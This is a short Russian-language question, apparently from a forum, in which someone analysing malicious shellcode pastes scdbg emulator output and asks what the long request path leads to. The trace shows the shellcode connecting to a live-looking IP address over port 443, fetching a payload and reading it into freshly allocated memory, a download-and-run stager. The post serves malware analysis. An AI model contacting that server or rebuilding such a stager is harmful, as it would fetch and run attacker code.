Я анализирую вредоносный шелл-код и хочу посмотреть, есть ли что-нибудь еще, из чего я могу собрать
HttpOpenRequestA(path: /kceT2iEf8t2UopWjz9YZSwpzYd02uD_-tbnHycAHK1WYniK03YEUqxZzmq_1b0rnQHrQIF0LBtwrw_Oqn0JQUS18WratsIdbYdSbgW7XrL9XtO5, )
Есть ли способ узнать, к чему ведет этот путь и какая программа была выполнена?
Это для следующего вывода scdbg:
40109b LoadLibraryA(wininet)
4010a9 InternetOpenA()
401132 InternetConnectA(server: 89.105.194.202, port: 443, )
401147 HttpOpenRequestA(path: /kceT2iEf8t2UopWjz9YZSwpzYd02uD_-tbnHycAHK1WYniK03YEUqxZzmq_1b0rnQHrQIF0LBtwrw_Oqn0JQUS18WratsIdbYdSbgW7XrL9XtO5, )
40115f InternetSetOptionA(h=4893, opt=1f, buf=12fdf4, blen=4)
40116b HttpSendRequestA()
401197 VirtualAlloc(base=0 , sz=400000) = 600000
4011ab InternetReadFile(4893, buf: 600000, size: 2000)